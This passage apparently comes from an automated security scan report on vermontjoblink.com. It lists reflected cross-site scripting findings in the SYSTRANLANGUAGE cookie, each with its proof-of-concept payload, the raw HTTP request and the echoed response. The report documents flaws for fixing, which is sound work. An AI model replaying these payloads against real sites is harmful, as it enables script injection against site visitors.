PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en17dbd"><img src=a onerror=alert(1)>abbcf0f134a">
...[SNIP]...

3.190. https://www.vermontjoblink.com/ada/customization/Vermont/documents/eeoislaw.cfm [SYSTRANLANGUAGE cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/customization/Vermont/documents/eeoislaw.cfm

Issue detail

The value of the SYSTRANLANGUAGE cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3d0cc"%3balert(1)//58328ab40e9 was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as 3d0cc";alert(1)//58328ab40e9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ada/customization/Vermont/documents/eeoislaw.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en3d0cc"%3balert(1)//58328ab40e9; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:15:43 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...
<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN3D0CC";ALERT(1)//58328AB40E9\">
...[SNIP]...

3.191. https://www.vermontjoblink.com/ada/customization/Vermont/documents/eeoislaw.cfm [SYSTRANLANGUAGE cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/customization/Vermont/documents/eeoislaw.cfm

Issue detail

The value of the SYSTRANLANGUAGE cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6398b"><img%20src%3da%20onerror%3dalert(1)>ba3c68b365f was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as 6398b"><img src=a onerror=alert(1)>ba3c68b365f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ada/customization/Vermont/documents/eeoislaw.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en6398b"><img%20src%3da%20onerror%3dalert(1)>ba3c68b365f; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:15:34 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en6398b"><img src=a onerror=alert(1)>ba3c68b365f">
...[SNIP]...

3.192. https://www.vermontjoblink.com/ada/customization/Vermont/documents/privacy.cfm [SYSTRANLANGUAGE cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/customization/Vermont/documents/privacy.cfm

Issue detail

The value of the SYSTRANLANGUAGE cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload acbaa"><img%20src%3da%20onerror%3dalert(1)>ae5b7c5d919 was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as acbaa"><img src=a onerror=alert(1)>ae5b7c5d919 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ada/customization/Vermont/documents/privacy.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=enacbaa"><img%20src%3da%20onerror%3dalert(1)>ae5b7c5d919; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:15:31 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="enacbaa"><img src=a onerror=alert(1)>ae5b7c5d919">
...[SNIP]...

3.193. https://www.vermontjoblink.com/ada/customization/Vermont/documents/privacy.cfm [SYSTRANLANGUAGE cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/customization/Vermont/documents/privacy.cfm

Issue detail

The value of the SYSTRANLANGUAGE cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4d941"%3balert(1)//bf7542d8709 was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as 4d941";alert(1)//bf7542d8709 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ada/customization/Vermont/documents/privacy.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en4d941"%3balert(1)//bf7542d8709; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:15:39 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-050